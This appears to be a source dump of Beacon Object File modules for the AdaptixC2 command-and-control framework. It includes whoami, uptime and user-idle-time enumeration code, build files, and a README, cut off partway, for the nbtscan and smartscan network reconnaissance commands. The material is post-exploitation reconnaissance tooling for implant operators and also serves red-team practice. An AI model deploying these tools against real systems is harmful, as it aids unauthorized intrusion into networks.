        BeaconPrintf(CALLBACK_ERROR, "*** DynamicLoad(%s) FAILED!\n", szFunction);
    }
    return fp;
}
#endif


char* Utf16ToUtf8(const wchar_t* input)
{
    int ret = KERNEL32$WideCharToMultiByte(
        CP_UTF8,
        0,
        input,
        -1,
        NULL,
        0,
        NULL,
        NULL
    );

    char* newString = (char*)intAlloc(sizeof(char) * ret);

    ret = KERNEL32$WideCharToMultiByte(
        CP_UTF8,
        0,
        input,
        -1,
        newString,
        sizeof(char) * ret,
        NULL,
        NULL
    );

    if (0 == ret)
    {
        goto fail;
    }

retloc:
    return newString;
/*location to free everything centrally*/
fail:
    if (newString){
        intFree(newString);
        newString = NULL;
    };
    goto retloc;
}

//release any global functions here
void bofstop()
{
#ifdef DYNAMIC_LIB_COUNT
    DWORD i;
    for(i = 0; i < loadedLibrariesCount; i++)
    {
        FreeLibrary(loadedLibraries[i].hMod);
    }
#endif
	return;
}


================================================
FILE: SAL-BOF/uptime/uptime.c
================================================
#include <windows.h>
#include "bofdefs.h"
#include "base.c"


#ifdef __x86_64__
void printUptime64() {
	// Counts millisecond ticks since last boot
	ULONGLONG ticks = KERNEL32$GetTickCount64();

	ULONGLONG seconds = ticks/1000;
	ULONGLONG minutes = seconds/60;
	ULONGLONG hours =   minutes/60;
	ULONGLONG days =	hours/24;

	internal_printf("Uptime: %lld days, %lld hours, %lld minutes, %lld seconds\n", 
		days, hours % 24, minutes % 60, seconds % 60);

	// MSDN recommends converting SysTime->FileTime before doing arithmetic
	SYSTEMTIME curTime = {0};
	FILETIME curFTime = {0};
	ULARGE_INTEGER utime;
	KERNEL32$GetLocalTime(&curTime);
	internal_printf("Local time: %4d-%.2d-%.2d %.2d:%.2d:%.2d\n", curTime.wYear, curTime.wMonth, 
			curTime.wDay, curTime.wHour, curTime.wMinute, curTime.wSecond);

	KERNEL32$SystemTimeToFileTime(&curTime, &curFTime);
	memcpy(&utime, &curFTime, sizeof(utime));
	utime.QuadPart -= ticks * 10000;

	memcpy(&curFTime, &utime, sizeof(utime));
	KERNEL32$FileTimeToSystemTime(&curFTime, &curTime);
	internal_printf("Boot time: %4d-%.2d-%.2d %.2d:%.2d:%.2d\n", curTime.wYear, curTime.wMonth, 
			curTime.wDay, curTime.wHour, curTime.wMinute, curTime.wSecond);
}
#endif

void printUptime32() {
	// Counts millisecond ticks since last boot
	DWORD ticks = KERNEL32$GetTickCount();
    
	DWORD seconds = ticks/1000;
	DWORD minutes = seconds/60;
	DWORD hours =   minutes/60;
	DWORD days =	hours/24;

	internal_printf("Uptime: %ld days, %ld hours, %ld minutes, %ld seconds\n", 
		days, hours % 24, minutes % 60, seconds % 60);
}

VOID go(
	IN PCHAR Buffer,
	IN ULONG Length
)
{
	if (!bofstart())
	{
		return;
	}
#ifdef __x86_64__
	printUptime64();
# else 
	printUptime32();
#endif
	printoutput(TRUE);
	bofstop();
};


================================================
FILE: SAL-BOF/useridletime/base.c
================================================
#include <windows.h>
#include "bofdefs.h"
#include "beacon.h"
#ifndef bufsize
#define bufsize 8192
#endif


char * output __attribute__((section (".data"))) = 0;  // this is just done so its we don't go into .bss which isn't handled properly
WORD currentoutsize __attribute__((section (".data"))) = 0;
HANDLE trash __attribute__((section (".data"))) = NULL; // Needed for x64 to not give relocation error

#ifdef BOF
int bofstart();
void internal_printf(const char* format, ...);
void printoutput(BOOL done);
#endif
char * Utf16ToUtf8(const wchar_t* input);

int bofstart()
{   
    output = (char*)MSVCRT$calloc(bufsize, 1);
    currentoutsize = 0;
    return 1;
}

void internal_printf(const char* format, ...){
    int buffersize = 0;
    int transfersize = 0;
    char * curloc = NULL;
    char* intBuffer = NULL;
    va_list args;
    va_start(args, format);
    buffersize = MSVCRT$vsnprintf(NULL, 0, format, args); // +1 because vsprintf goes to buffersize-1 , and buffersize won't return with the null
    va_end(args);
    
    // vsnprintf will return -1 on encoding failure (ex. non latin characters in Wide string)
    if (buffersize == -1)
        return;
    
    char* transferBuffer = (char*)intAlloc(bufsize);
    intBuffer = (char*)intAlloc(buffersize);
    /*Print string to memory buffer*/
    va_start(args, format);
    MSVCRT$vsnprintf(intBuffer, buffersize, format, args); // tmpBuffer2 has a null terminated string
    va_end(args);
    if(buffersize + currentoutsize < bufsize) // If this print doesn't overflow our output buffer, just buffer it to the end
    {
        //BeaconFormatPrintf(&output, intBuffer);
        memcpy(output+currentoutsize, intBuffer, buffersize);
        currentoutsize += buffersize;
    }
    else // If this print does overflow our output buffer, lets print what we have and clear any thing else as it is likely this is a large print
    {
        curloc = intBuffer;
        while(buffersize > 0)
        {
            transfersize = bufsize - currentoutsize; // what is the max we could transfer this request
            if(buffersize < transfersize) //if I have less then that, lets just transfer what's left
            {
                transfersize = buffersize;
            }
            memcpy(output+currentoutsize, curloc, transfersize); // copy data into our transfer buffer
            currentoutsize += transfersize;
            if(currentoutsize == bufsize)
            {
            printoutput(FALSE); // sets currentoutsize to 0 and prints
            }
            memset(transferBuffer, 0, transfersize); // reset our transfer buffer
            curloc += transfersize; // increment by how much data we just wrote
            buffersize -= transfersize; // subtract how much we just wrote from how much we are writing overall
        }
    }
    intFree(intBuffer);
    intFree(transferBuffer);
}

void printoutput(BOOL done)
{

    char * msg = NULL;
    BeaconOutput(CALLBACK_OUTPUT, output, currentoutsize);
    currentoutsize = 0;
    memset(output, 0, bufsize);
    if(done) {MSVCRT$free(output); output=NULL;}
}


#ifdef DYNAMIC_LIB_COUNT


typedef struct loadedLibrary {
    HMODULE hMod; // mod handle
    const char * name; // name normalized to uppercase
}loadedLibrary, *ploadedLibrary;
loadedLibrary loadedLibraries[DYNAMIC_LIB_COUNT] __attribute__((section (".data"))) = {0};
DWORD loadedLibrariesCount __attribute__((section (".data"))) = 0;

BOOL intstrcmp(LPCSTR szLibrary, LPCSTR sztarget)
{
    BOOL bmatch = FALSE;
    DWORD pos = 0;
    while(szLibrary[pos] && sztarget[pos])
    {
        if(szLibrary[pos] != sztarget[pos])
        {
            goto end;
        }
        pos++;
    }
    if(szLibrary[pos] | sztarget[pos]) // if either of these down't equal null then they can't match
        {goto end;}
    bmatch = TRUE;

    end:
    return bmatch;
}

FARPROC DynamicLoad(const char * szLibrary, const char * szFunction)
{
    FARPROC fp = NULL;
    HMODULE hMod = NULL;
    DWORD i = 0;
    DWORD liblen = 0;
    for(i = 0; i < loadedLibrariesCount; i++)
    {
        if(intstrcmp(szLibrary, loadedLibraries[i].name))
        {
            hMod = loadedLibraries[i].hMod;
        }
    }
    if(!hMod)
    {
        hMod = LoadLibraryA(szLibrary);
        if(!hMod){ 
            BeaconPrintf(CALLBACK_ERROR, "*** DynamicLoad(%s) FAILED!\nCould not find library to load.", szLibrary);
            return NULL;
        }
        loadedLibraries[loadedLibrariesCount].hMod = hMod;
        loadedLibraries[loadedLibrariesCount].name = szLibrary; //And this is why this HAS to be a constant or not freed before bofstop
        loadedLibrariesCount++;
    }
    fp = GetProcAddress(hMod, szFunction);

    if (NULL == fp)
    {
        BeaconPrintf(CALLBACK_ERROR, "*** DynamicLoad(%s) FAILED!\n", szFunction);
    }
    return fp;
}
#endif


char* Utf16ToUtf8(const wchar_t* input)
{
    int ret = KERNEL32$WideCharToMultiByte(
        CP_UTF8,
        0,
        input,
        -1,
        NULL,
        0,
        NULL,
        NULL
    );

    char* newString = (char*)intAlloc(sizeof(char) * ret);

    ret = KERNEL32$WideCharToMultiByte(
        CP_UTF8,
        0,
        input,
        -1,
        newString,
        sizeof(char) * ret,
        NULL,
        NULL
    );

    if (0 == ret)
    {
        goto fail;
    }

retloc:
    return newString;
/*location to free everything centrally*/
fail:
    if (newString){
        intFree(newString);
        newString = NULL;
    };
    goto retloc;
}

//release any global functions here
void bofstop()
{
#ifdef DYNAMIC_LIB_COUNT
    DWORD i;
    for(i = 0; i < loadedLibrariesCount; i++)
    {
        FreeLibrary(loadedLibraries[i].hMod);
    }
#endif
	return;
}


================================================
FILE: SAL-BOF/useridletime/useridletime.c
================================================
#include <windows.h>
#include "bofdefs.h"
#include "base.c"

void userIdletime() {
	LASTINPUTINFO lii = {0};
    DWORD tickCount = 0, idleTime = 0;


    lii.cbSize = sizeof(LASTINPUTINFO);

    if (USER32$GetLastInputInfo(&lii)) {
        tickCount = KERNEL32$GetTickCount();
        idleTime = (tickCount - lii.dwTime) / 1000; // Convert to seconds
		DWORD seconds = idleTime % 60;
		DWORD minutes = (idleTime / 60) % 60;
		DWORD hours = (idleTime / 3600) % 24;
		DWORD days = idleTime / 86400;

		internal_printf("Current User idle time: %lu days, %lu hours, %lu minutes, %lu seconds",days, hours, minutes, seconds);
    } else {
        internal_printf("Failed to retrieve last user idle time");
    }
}

#pragma comment(lib, "wtsapi32.lib")



VOID go(
	IN PCHAR Buffer,
	IN ULONG Length
)
{
	if (!bofstart())
	{
		return;
	}
	userIdletime();
	printoutput(TRUE);
	bofstop();
};

================================================
FILE: SAL-BOF/whoami/base.c
================================================
#include <windows.h>
#include "bofdefs.h"
#include "beacon.h"
#ifndef bufsize
#define bufsize 8192
#endif


char * output __attribute__((section (".data"))) = 0;  // this is just done so its we don't go into .bss which isn't handled properly
WORD currentoutsize __attribute__((section (".data"))) = 0;
HANDLE trash __attribute__((section (".data"))) = NULL; // Needed for x64 to not give relocation error

#ifdef BOF
int bofstart();
void internal_printf(const char* format, ...);
void printoutput(BOOL done);
#endif
char * Utf16ToUtf8(const wchar_t* input);

int bofstart()
{   
    output = (char*)MSVCRT$calloc(bufsize, 1);
    currentoutsize = 0;
    return 1;
}

void internal_printf(const char* format, ...){
    int buffersize = 0;
    int transfersize = 0;
    char * curloc = NULL;
    char* intBuffer = NULL;
    va_list args;
    va_start(args, format);
    buffersize = MSVCRT$vsnprintf(NULL, 0, format, args); // +1 because vsprintf goes to buffersize-1 , and buffersize won't return with the null
    va_end(args);
    
    // vsnprintf will return -1 on encoding failure (ex. non latin characters in Wide string)
    if (buffersize == -1)
        return;
    
    char* transferBuffer = (char*)intAlloc(bufsize);
    intBuffer = (char*)intAlloc(buffersize);
    /*Print string to memory buffer*/
    va_start(args, format);
    MSVCRT$vsnprintf(intBuffer, buffersize, format, args); // tmpBuffer2 has a null terminated string
    va_end(args);
    if(buffersize + currentoutsize < bufsize) // If this print doesn't overflow our output buffer, just buffer it to the end
    {
        //BeaconFormatPrintf(&output, intBuffer);
        memcpy(output+currentoutsize, intBuffer, buffersize);
        currentoutsize += buffersize;
    }
    else // If this print does overflow our output buffer, lets print what we have and clear any thing else as it is likely this is a large print
    {
        curloc = intBuffer;
        while(buffersize > 0)
        {
            transfersize = bufsize - currentoutsize; // what is the max we could transfer this request
            if(buffersize < transfersize) //if I have less then that, lets just transfer what's left
            {
                transfersize = buffersize;
            }
            memcpy(output+currentoutsize, curloc, transfersize); // copy data into our transfer buffer
            currentoutsize += transfersize;
            if(currentoutsize == bufsize)
            {
            printoutput(FALSE); // sets currentoutsize to 0 and prints
            }
            memset(transferBuffer, 0, transfersize); // reset our transfer buffer
            curloc += transfersize; // increment by how much data we just wrote
            buffersize -= transfersize; // subtract how much we just wrote from how much we are writing overall
        }
    }
    intFree(intBuffer);
    intFree(transferBuffer);
}

void printoutput(BOOL done)
{

    char * msg = NULL;
    BeaconOutput(CALLBACK_OUTPUT, output, currentoutsize);
    currentoutsize = 0;
    memset(output, 0, bufsize);
    if(done) {MSVCRT$free(output); output=NULL;}
}


#ifdef DYNAMIC_LIB_COUNT


typedef struct loadedLibrary {
    HMODULE hMod; // mod handle
    const char * name; // name normalized to uppercase
}loadedLibrary, *ploadedLibrary;
loadedLibrary loadedLibraries[DYNAMIC_LIB_COUNT] __attribute__((section (".data"))) = {0};
DWORD loadedLibrariesCount __attribute__((section (".data"))) = 0;

BOOL intstrcmp(LPCSTR szLibrary, LPCSTR sztarget)
{
    BOOL bmatch = FALSE;
    DWORD pos = 0;
    while(szLibrary[pos] && sztarget[pos])
    {
        if(szLibrary[pos] != sztarget[pos])
        {
            goto end;
        }
        pos++;
    }
    if(szLibrary[pos] | sztarget[pos]) // if either of these down't equal null then they can't match
        {goto end;}
    bmatch = TRUE;

    end:
    return bmatch;
}

FARPROC DynamicLoad(const char * szLibrary, const char * szFunction)
{
    FARPROC fp = NULL;
    HMODULE hMod = NULL;
    DWORD i = 0;
    DWORD liblen = 0;
    for(i = 0; i < loadedLibrariesCount; i++)
    {
        if(intstrcmp(szLibrary, loadedLibraries[i].name))
        {
            hMod = loadedLibraries[i].hMod;
        }
    }
    if(!hMod)
    {
        hMod = LoadLibraryA(szLibrary);
        if(!hMod){ 
            BeaconPrintf(CALLBACK_ERROR, "*** DynamicLoad(%s) FAILED!\nCould not find library to load.", szLibrary);
            return NULL;
        }
        loadedLibraries[loadedLibrariesCount].hMod = hMod;
        loadedLibraries[loadedLibrariesCount].name = szLibrary; //And this is why this HAS to be a constant or not freed before bofstop
        loadedLibrariesCount++;
    }
    fp = GetProcAddress(hMod, szFunction);

    if (NULL == fp)
    {
        BeaconPrintf(CALLBACK_ERROR, "*** DynamicLoad(%s) FAILED!\n", szFunction);
    }
    return fp;
}
#endif


char* Utf16ToUtf8(const wchar_t* input)
{
    int ret = KERNEL32$WideCharToMultiByte(
        CP_UTF8,
        0,
        input,
        -1,
        NULL,
        0,
        NULL,
        NULL
    );

    char* newString = (char*)intAlloc(sizeof(char) * ret);

    ret = KERNEL32$WideCharToMultiByte(
        CP_UTF8,
        0,
        input,
        -1,
        newString,
        sizeof(char) * ret,
        NULL,
        NULL
    );

    if (0 == ret)
    {
        goto fail;
    }

retloc:
    return newString;
/*location to free everything centrally*/
fail:
    if (newString){
        intFree(newString);
        newString = NULL;
    };
    goto retloc;
}

//release any global functions here
void bofstop()
{
#ifdef DYNAMIC_LIB_COUNT
    DWORD i;
    for(i = 0; i < loadedLibrariesCount; i++)
    {
        FreeLibrary(loadedLibraries[i].hMod);
    }
#endif
	return;
}


================================================
FILE: SAL-BOF/whoami/whoami.c
================================================
#include <windows.h>
#define SECURITY_WIN32
#include <security.h>
#include <sddl.h>
#include "bofdefs.h"
#include "base.c"

typedef struct
{
    UINT Rows;
    UINT Cols;
    LPWSTR Content[1];
} WhoamiTable;

char* WhoamiGetUser(EXTENDED_NAME_FORMAT NameFormat)
{
    char* UsrBuf = intAlloc(MAX_PATH);
    ULONG UsrSiz = MAX_PATH;

    if (UsrBuf == NULL)
        return NULL;

    if (SECUR32$GetUserNameExA(NameFormat, UsrBuf, &UsrSiz))
    {
        return UsrBuf;
    }

    intFree(UsrBuf);
    return NULL;
}

VOID* WhoamiGetTokenInfo(TOKEN_INFORMATION_CLASS TokenType)
{
    HANDLE hToken = 0;
    DWORD dwLength = 0;
    VOID* pTokenInfo = 0;

    if (ADVAPI32$OpenProcessToken(KERNEL32$GetCurrentProcess(), TOKEN_READ, &hToken))
    {
        ADVAPI32$GetTokenInformation(hToken,
                            TokenType,
                            NULL,
                            dwLength,
                            &dwLength);

        if (KERNEL32$GetLastError() == ERROR_INSUFFICIENT_BUFFER)
        {
            pTokenInfo = intAlloc(dwLength);
            if (pTokenInfo == NULL)
            {
                //printf("ERROR: not enough memory to allocate the token structure.\r\n");
                KERNEL32$CloseHandle(hToken);
                return NULL;
            }
        }

        if (!ADVAPI32$GetTokenInformation(hToken, TokenType,
                                 (LPVOID)pTokenInfo,
                                 dwLength,
                                 &dwLength))
        {
            //printf("ERROR 0x%x: could not get token information.\r\n", GetLastError());
            KERNEL32$CloseHandle(hToken);
            intFree(pTokenInfo);
            return NULL;
        }

        KERNEL32$CloseHandle(hToken);
    }

    return pTokenInfo;
}


int WhoamiUser(void)
{
    PTOKEN_USER pUserInfo = (PTOKEN_USER) WhoamiGetTokenInfo(TokenUser);
    char* pUserStr = NULL;
    char* pSidStr = NULL;
    WhoamiTable *UserTable = NULL;
    int retval = 0;

    if (pUserInfo == NULL)
    {
        retval = 1;
        goto end;
    }

    pUserStr = WhoamiGetUser(NameSamCompatible);
    if (pUserStr == NULL)
    {
        retval = 1;
        goto end;
    }

    internal_printf("\nUserName\t\tSID\n");
    internal_printf("====================== ====================================\n");

    ADVAPI32$ConvertSidToStringSidA(pUserInfo->User.Sid, &pSidStr);

    internal_printf("%s\t%s\n\n", pUserStr, pSidStr);


    /* cleanup our allocations */
    end:
    if(pSidStr){KERNEL32$LocalFree(pSidStr);}
    if(pUserInfo){intFree(pUserInfo);}
    if(pUserStr){intFree(pUserStr);};

    return retval;
}

int WhoamiGroups(void)
{
    DWORD dwIndex = 0;
    char* pSidStr = NULL;

    char szGroupName[255] = {0};
    char szDomainName[255] = {0};

    DWORD cchGroupName  = _countof(szGroupName);
    DWORD cchDomainName = _countof(szDomainName);

    SID_NAME_USE Use = 0;

    PTOKEN_GROUPS pGroupInfo = (PTOKEN_GROUPS)WhoamiGetTokenInfo(TokenGroups);
    WhoamiTable *GroupTable = NULL;

    if (pGroupInfo == NULL)
    {
        return 1;
    }

    /* the header is the first (0) row, so we start in the second one (1) */


    internal_printf("\n%-50s%-25s%-45s%-25s\n", "GROUP INFORMATION", "Type", "SID", "Attributes");
    internal_printf("================================================= ===================== ============================================= ==================================================\n");

    for (dwIndex = 0; dwIndex < pGroupInfo->GroupCount; dwIndex++)
    {
        if(ADVAPI32$LookupAccountSidA(NULL,
                          pGroupInfo->Groups[dwIndex].Sid,
                          (LPSTR)&szGroupName,
                          &cchGroupName,
                          (LPSTR)&szDomainName,
                          &cchDomainName,
                          &Use) == 0)
        {
            //If we fail lets try to get the next entry
            continue;
        }

        /* the original tool seems to limit the list to these kind of SID items */
        if ((Use == SidTypeWellKnownGroup || Use == SidTypeAlias ||
            Use == SidTypeLabel || Use == SidTypeGroup) && !(pGroupInfo->Groups[dwIndex].Attributes & SE_GROUP_LOGON_ID))
        {
                char tmpBuffer[1024] = {0};

            /* looks like windows treats 0x60 as 0x7 for some reason, let's just nod and call it a day:
               0x60 is SE_GROUP_INTEGRITY | SE_GROUP_INTEGRITY_ENABLED
               0x07 is SE_GROUP_MANDATORY | SE_GROUP_ENABLED_BY_DEFAULT | SE_GROUP_ENABLED */

            if (pGroupInfo->Groups[dwIndex].Attributes == 0x60)
                pGroupInfo->Groups[dwIndex].Attributes = 0x07;

            /* 1- format it as DOMAIN\GROUP if the domain exists, or just GROUP if not */
            MSVCRT$sprintf((char*)&tmpBuffer, "%s%s%s", szDomainName, cchDomainName ? "\\" : "", szGroupName);
            internal_printf("%-50s", tmpBuffer);

            /* 2- let's find out the group type by using a simple lookup table for lack of a better method */
            if (Use == SidTypeWellKnownGroup){
                internal_printf("%-25s", "Well-known group ");
            }
            else if (Use == SidTypeAlias){
                internal_printf("%-25s", "Alias ");
            }
            else if (Use == SidTypeLabel){
                internal_printf("%-25s", "Label ");
            }
            else if (Use == SidTypeGroup) {
                internal_printf("%-25s", "Group ");
            }
            /* 3- turn that SID into text-form */
            if(ADVAPI32$ConvertSidToStringSidA(pGroupInfo->Groups[dwIndex].Sid, &pSidStr)){

            //WhoamiSetTable(GroupTable, pSidStr, PrintingRow, 2);
                internal_printf("%-45s ", pSidStr);

                KERNEL32$LocalFree(pSidStr);
                pSidStr = NULL;

            }

            /* 4- reuse that buffer for appending the attributes in text-form at the very end */
            ZeroMemory(tmpBuffer, sizeof(tmpBuffer));

            if (pGroupInfo->Groups[dwIndex].Attributes & SE_GROUP_MANDATORY)
                internal_printf("Mandatory group, ");
            if (pGroupInfo->Groups[dwIndex].Attributes & SE_GROUP_ENABLED_BY_DEFAULT)
                internal_printf("Enabled by default, ");
            if (pGroupInfo->Groups[dwIndex].Attributes & SE_GROUP_ENABLED)
                internal_printf("Enabled group, ");
            if (pGroupInfo->Groups[dwIndex].Attributes & SE_GROUP_OWNER)
                internal_printf("Group owner, ");
            internal_printf("\n");
        }
        /* reset the buffers so that we can reuse them */
        ZeroMemory(szGroupName, sizeof(szGroupName));
        ZeroMemory(szDomainName, sizeof(szDomainName));

        cchGroupName = 255;
        cchDomainName = 255;
    }


    /* cleanup our allocations */
    intFree(pGroupInfo);

    return 0;
}

int WhoamiPriv(void)
{
    PTOKEN_PRIVILEGES pPrivInfo = (PTOKEN_PRIVILEGES) WhoamiGetTokenInfo(TokenPrivileges);
    DWORD dwResult = 0, dwIndex = 0;
    WhoamiTable *PrivTable = NULL;

    if (pPrivInfo == NULL)
    {
        return 1;
    }

    internal_printf("\n\n%-30s%-50s%-30s\n", "Privilege Name", "Description", "State");
    internal_printf("============================= ================================================= ===========================\n");

    for (dwIndex = 0; dwIndex < pPrivInfo->PrivilegeCount; dwIndex++)
    {
        char* PrivName = NULL;
        char* DispName = NULL;
        DWORD PrivNameSize = 0, DispNameSize = 0;
        BOOL ret = FALSE;

        ADVAPI32$LookupPrivilegeNameA(NULL,
                                   &pPrivInfo->Privileges[dwIndex].Luid,
                                   NULL,
                                   &PrivNameSize); // getting size

        PrivName = intAlloc(++PrivNameSize);

        if(ADVAPI32$LookupPrivilegeNameA(NULL,
                             &pPrivInfo->Privileges[dwIndex].Luid,
                             PrivName,
                             &PrivNameSize) == 0)
                             {
                                 if(PrivName){intFree(PrivName); PrivName = NULL;}
                                 continue; // try to get next
                             }

        //WhoamiSetTableDyn(PrivTable, PrivName, dwIndex + 1, 0);
        internal_printf("%-30s", PrivName);


        /* try to grab the size of the string, also, beware, as this call is
           unimplemented in ReactOS/Wine at the moment */

        ADVAPI32$LookupPrivilegeDisplayNameA(NULL, PrivName, NULL, &DispNameSize, &dwResult);

        DispName = intAlloc(++DispNameSize);

        ret = ADVAPI32$LookupPrivilegeDisplayNameA(NULL, PrivName, DispName, &DispNameSize, &dwResult);
        if(PrivName != NULL)
            intFree(PrivName);
        if (ret && DispName)
        {
            internal_printf("%-50s", DispName);
        }
        else
        {
            internal_printf("%-50s", "???");
        }
        if (DispName != NULL)
                intFree(DispName);

        if (pPrivInfo->Privileges[dwIndex].Attributes & SE_PRIVILEGE_ENABLED)
            internal_printf("%-30s\n", "Enabled");
        else
            internal_printf("%-30s\n", "Disabled");
    }


    /* cleanup our allocations */
    if(pPrivInfo){intFree(pPrivInfo);}

    return 0;
}

VOID go( 
	IN PCHAR Buffer, 
	IN ULONG Length 
) 
{
	if(!bofstart())
	{
		return;
	}
	(void)WhoamiUser();
	(void)WhoamiGroups();
	(void)WhoamiPriv();
	printoutput(TRUE);
};


================================================
FILE: SAR-BOF/CMakeLists.txt
================================================
cmake_minimum_required(VERSION 3.16)
#project(SAR-BOF C)

set(CMAKE_C_STANDARD 99)

# Include directories (main _include is at root level)
include_directories(${CMAKE_SOURCE_DIR}/_include)

# Source files
set(SMARTSCAN_SOURCES smartscan/portscan_simple.c)
set(TASKHOUND_SOURCES taskhound/taskhound.c)
set(QUSER_SOURCES quser/quser.c)
set(NBTSCAN_SOURCES nbtscan/nbtscan.c)

# Compiler flags
set(CMAKE_C_FLAGS "${CMAKE_C_FLAGS} -Os -DBOF")
set(CMAKE_C_FLAGS_RELEASE "${CMAKE_C_FLAGS_RELEASE} -s")

# Object file targets
add_library(smartscan OBJECT ${SMARTSCAN_SOURCES})

add_library(taskhound OBJECT ${TASKHOUND_SOURCES})
target_compile_options(taskhound PRIVATE -mno-stack-arg-probe)

add_library(quser OBJECT ${QUSER_SOURCES})

add_library(nbtscan OBJECT ${NBTSCAN_SOURCES})

# Create _bin directory
file(MAKE_DIRECTORY ${CMAKE_CURRENT_SOURCE_DIR}/_bin)

# Custom commands to copy object files to _bin
add_custom_target(copy_smartscan ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:smartscan> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/smartscan.x64.o
    DEPENDS smartscan
    COMMENT "Copying smartscan object file"
)

add_custom_target(copy_taskhound ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:taskhound> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/taskhound.x64.o
    DEPENDS taskhound
    COMMENT "Copying taskhound object file"
)

add_custom_target(copy_quser ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:quser> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/quser.x64.o
    DEPENDS quser
    COMMENT "Copying quser object file"
)

add_custom_target(copy_nbtscan ALL
        COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:nbtscan> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/nbtscan.x64.o
        DEPENDS nbtscan
        COMMENT "Copying nbtscan object file"
)

================================================
FILE: SAR-BOF/Makefile
================================================
CC64 = x86_64-w64-mingw32-gcc
CC86 = i686-w64-mingw32-gcc
STRIP64 = x86_64-w64-mingw32-strip --strip-unneeded
STRIP86 = i686-w64-mingw32-strip --strip-unneeded
CFLAGS = -I ../_include -DBOF -c

all: bof

bof: clean
	@(mkdir _bin 2>/dev/null) && echo 'creating _bin directory' || echo '_bin directory exists'

	# 64-bit builds
	@($(CC64) $(CFLAGS) -s smartscan/portscan_simple.c -o _bin/smartscan.x64.o && $(STRIP64) _bin/smartscan.x64.o) && echo '[+] smartscan' || echo '[!] smartscan'
	@($(CC64) $(CFLAGS) -s nbtscan/nbtscan.c -o _bin/nbtscan.x64.o && $(STRIP64) _bin/nbtscan.x64.o) && echo '[+] nbtscan' || echo '[!] nbtscan'
	@($(CC64) $(CFLAGS) taskhound/taskhound.c -o _bin/taskhound.x64.o && $(STRIP64) _bin/taskhound.x64.o) && echo '[+] taskhound' || echo '[!] taskhound'
	@($(CC64) $(CFLAGS) quser/quser.c -o _bin/quser.x64.o && $(STRIP64) _bin/quser.x64.o) && echo '[+] quser' || echo '[!] quser'

	# 32-bit builds
	@($(CC86) $(CFLAGS) -s smartscan/portscan_simple.c -o _bin/smartscan.x32.o   && $(STRIP86) _bin/smartscan.x32.o)   && echo '[+] smartscan (x32)'   || echo '[!] smartscan (x32)'
	@($(CC86) $(CFLAGS) -s nbtscan/nbtscan.c           -o _bin/nbtscan.x32.o     && $(STRIP86) _bin/nbtscan.x32.o)     && echo '[+] nbtscan (x32)'     || echo '[!] nbtscan (x32)'
	@#($(CC86) $(CFLAGS) taskhound/taskhound.c          -o _bin/taskhound.x32.o   && $(STRIP86) _bin/taskhound.x32.o)   && echo '[+] taskhound (x32)'   || echo '[!] taskhound (x32)'
	@($(CC86) $(CFLAGS) quser/quser.c                  -o _bin/quser.x32.o       && $(STRIP86) _bin/quser.x32.o)       && echo '[+] quser (x32)'       || echo '[!] quser (x32)'

clean:
	@(rm -rf _bin)

================================================
FILE: SAR-BOF/README.md
================================================
# SAR-BOF

This extension enhances situational awareness by providing a set of remote Beacon Object File (BOF) commands. These commands allow the operator to gather detailed information about the target.

![](_img/01.png)



## nbtscan

NetBIOS name scanner that queries NetBIOS name service (port 137) to discover NetBIOS names, MAC addresses, and service information from Windows hosts on the network. Automatically registers discovered targets in AdaptixC2.

```
nbtscan <target> [-v] [-q] [-e] [-l] [-s <separator>] [-t <timeout>] [-no-targets]
```

- `target` (required): Destination IP address, range or CIDR format
    - Single IP: `192.168.1.1`
    - IP range: `192.168.1.1-192.168.1.20` or `192.168.1.1-20`
    - CIDR: `192.168.1.0/24`
    - Comma-separated: `192.168.1.1,192.168.1.5,192.168.1.10`
- `-v` (optional): Verbose output - shows detailed NetBIOS information including service types
- `-q` (optional): Quiet mode - suppresses error messages
- `-e` (optional): Output in `/etc/hosts` format
- `-l` (optional): Output in `lmhosts` format
- `-s <separator>` (optional): Script-friendly output with custom separator (enables script mode)
- `-t <timeout>` (optional): Response timeout in milliseconds (default: 1000, max: 600000)
- `-no-targets` (optional): Disable automatic target registration in Adaptix

**Output Formats:**

1. **Normal mode** (default): Shows IP address, NetBIOS name, and MAC address
2. **Verbose mode** (`-v`): Shows detailed information including:
    - NetBIOS names with service types (00, 03, 20, etc.)
    - MAC address
    - Domain/workgroup information
3. **Script mode** (`-s <separator>`): Machine-readable output with custom separator
4. **Hosts format** (`-e` or `-l`): Output suitable for `/etc/hosts` or `lmhosts` files

**NetBIOS Service Types:**

| Code | Service Type |
|------|--------------|
| `00` | Workstation Service |
| `03` | Messenger Service |
| `20` | File Server Service |
| `1B` | Domain Master Browser |
| `1C` | Domain Controller |
| `1D` | Master Browser |
| `1E` | Browser Service Elections |

```Shell
# Basic scan of a single host
nbtscan 192.168.1.1

# Scan a subnet
nbtscan 192.168.1.0/24

# Scan an IP range
nbtscan 192.168.1.1-192.168.1.20

# Verbose output with detailed information
nbtscan 192.168.1.0/24 -v

# Quiet mode (suppress errors)
nbtscan 192.168.1.0/24 -q

# Output in /etc/hosts format
nbtscan 192.168.1.0/24 -e

# Output in lmhosts format
nbtscan 192.168.1.0/24 -l

# Script-friendly output with custom separator
nbtscan 192.168.1.0/24 -s "|"

# Custom timeout (2 seconds)
nbtscan 192.168.1.0/24 -t 2000

# Scan without auto-registering targets
nbtscan 192.168.1.0/24 -no-targets

# Combined: verbose scan with custom timeout
nbtscan 192.168.1.0/24 -v -t 3000
```

**Target Registration:**

By default, nbtscan automatically registers discovered hosts in Adaptix with the following information:
- Computer name (from NetBIOS name)
- Domain/workgroup (if available)
- IP address
- OS information (if detected)
- MAC address

Use `-no-targets` flag to disable automatic registration if you only want to view the scan results without adding them to Adaptix targets.



## smartscan

Single-threaded silent port scanner

```
smartscan <targets> [-p mode/port_list]
```

**Modes**
1. fast
* Web services: 80, 443, 8080, 8443
* Databases: 1433, 1521, 3306, 5432, 6379, 27017
2. standart
* Web Services: 80, 443, 8080, 8443
* Databases: 1433, 1521, 3306, 5432, 6379, 27017
* Windows-specific: 135, 139, 445, 3389, 5985, 5986
* Linux-specific: 22
* Infrastructure: 21, 25, 53, 110, 143, 993, 995
3. full
* Web Services: 80, 443, 8080, 8443, 8000, 8888
